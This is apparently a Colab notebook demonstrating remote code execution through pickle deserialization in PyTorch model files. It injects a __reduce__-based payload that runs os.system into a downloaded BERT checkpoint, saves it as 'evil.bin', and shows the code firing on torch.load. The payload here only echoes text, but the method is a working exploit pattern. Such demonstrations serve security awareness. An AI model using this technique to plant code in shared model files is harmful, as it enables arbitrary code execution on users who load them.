<a href="https://colab.research.google.com/github/alex46300/Tool-In-Action-2018/blob/master/Demo_RCE_PyTorch.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

First download a PyTorch model, our example will take Bert from HuggingFace.

In [ ]:
from transformers import AutoTokenizer, AutoModelForMaskedLM

tokenizer = AutoTokenizer.from_pretrained("google-bert/bert-base-uncased")
model = AutoModelForMaskedLM.from_pretrained("google-bert/bert-base-uncased", use_safetensors=False)

Restart runtime, then we change directory to get the raw model file.

In [ ]:
import os

os.chdir("/root/.cache/huggingface/hub/models--google-bert--bert-base-uncased/snapshots")
os.chdir("./" + os.listdir(".")[0])

Set the payload we want to inject, here, a simple print will be enough to provide us an evidence of the vulnerability of the pickle format.

In [ ]:
# Payload to inject
ON_REDUCE = """
import os;os.system('echo "Hello Adeo !"');print("Payload initialization")
"""

class Payload:
    def __reduce__(self):
        return (exec, (ON_REDUCE,))

Defeat the serialization processof PyTorch.

In [ ]:
import torch

# Load a PyTorch model
model = torch.load('pytorch_model.bin')

# Inject the payload into the model's state_dict
model['payload'] = Payload()

# Overwrite the serialization magic number with the payload to use Pickle's vulnerability on __reduce__ method
torch.serialization.MAGIC_NUMBER = Payload()

In [ ]:
# Save the malicious model
torch.save(model, '/content/evil.bin')
os.chdir("/content/")

In [ ]:
# Load the malicious model
print('Loading the malicious model...')
torch.load('evil.bin')
print('Code Execution Done !')

Loading the malicious model...
Payload initialization
Code Execution Done !


Done !